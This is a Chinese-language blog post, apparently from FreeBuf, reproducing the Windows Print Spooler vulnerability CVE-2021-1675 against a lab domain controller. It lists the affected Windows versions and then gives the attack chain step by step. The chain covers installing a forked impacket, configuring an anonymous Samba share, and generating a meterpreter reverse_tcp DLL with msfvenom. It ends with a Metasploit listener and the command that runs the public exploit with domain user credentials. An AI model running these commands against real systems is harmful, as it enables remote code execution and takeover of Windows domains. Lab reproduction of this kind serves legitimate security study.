微软漏洞 Cve-2021-1675复现 – 作者:zcczcc

受影响版本

• Windows Server 2012 R2 (Server Core installation)

• Windows Server 2012 R2

• Windows Server 2012 (Server Core installation)

• Windows Server 2012

• Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

• Windows Server 2008 R2 for x64-based Systems Service Pack 1

• Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

• Windows Server 2008 for x64-based Systems Service Pack 2

• Windows Server 2008 32-bit Systems Service Pack 2 (Server Core installation)

• Windows Server 2008 32-bit Systems Service Pack 2

• Windows RT 8.1

• Windows 8.1 for x64-based systems

• Windows 8.1 32-bit systems

• Windows 7 for x64-based Systems Service Pack 1

• Windows 7 32-bit Systems Service Pack 1

• Windows Server 2016 (Server Core installation)

• Windows Server 2016

• Windows 10 Version 1607 for x64-based Systems

• Windows 10 Version 1607 32-bit Systems

• Windows 10 for x64-based Systems

• Windows 10 32-bit Systems

• Windows Server, version 20H2 (Server Core Installation)

• Windows 10 Version 20H2 for ARM64-based Systems

• Windows 10 Version 20H2 32-bit Systems

• Windows 10 Version 20H2 for x64-based Systems

• Windows Server, version 2004 (Server Core installation)

• Windows 10 Version 2004 for x64-based Systems

• Windows 10 Version 2004 for ARM64-based Systems

• Windows 10 Version 2004 32-bit Systems

• Windows 10 Version 21H1 32-bit Systems

• Windows 10 Version 21H1 for ARM64-based Systems

• Windows 10 Version 21H1 for x64-based Systems

• Windows Server, version 1909 (Server Core installation)

• Windows 10 Version 1909 for ARM64-based Systems

• Windows 10 Version 1909 for x64-based Systems

• Windows 10 Version 1909 32-bit Systems

• Windows Server 2019 (Server Core installation)

• Windows Server 2019

• Windows 10 Version 1809 for ARM64-based Systems

• Windows 10 Version 1809 for x64-based Systems

• Windows 10 Version 1809 32-bit Systems

准备环境：kali：192.168.173.133

域控：Windows 2019 192.168.173.139（必须是2019或者2016）

首先，创建一个域控（创建域控步骤忽略）：

创建一个普通域用户：

Windows机默认都是开启print Spooler服务的，不然无法实现打印；

1.先把作者的impacket包下载下来运行，链接为

https://github.com/cube0x0/impacket

运行

cd impacket
python3 ./setup.py install

2.开启匿名访问smb

2.1 配置/etc/samba/smb.conf

这里我使用原作者的也不行，后面参考了Gamma实验室公众号的配置才可以成功访问，链接在此：https://mp.weixin.qq.com/s/iNOb6cBAfMwCm2AjqbdEvQ

[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445

[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes

配置完后，启动smbd

sudo service smbd start

因为spoolsv.exe是x64的，所以生成的dll也得是x64，生成dll

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.153.133 LPORT=7893 -f dll -o /tmp/rever.dll

开启监听

msfconsole
use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.173.133
set lport 7893
run

exp链接：

https://github.com/cube0x0/CVE-2021-1675

直接上exp

python3 CVE-2021-1675.py 域名/域普通用户名:用户密码@域控IP smb共享文件的路径

最后一步这里我出现了一个玄学问题，一直上不了线，哪怕是拿师兄能够上线的虚拟机环境拷贝到我电脑上也不行，所以这里就让他截了个图。。周末重装系统去，这种情况不是第一次了，重装系统解决100%的问题。

来源：freebuf.com 2021-07-07 12:11:14 by: zcczcc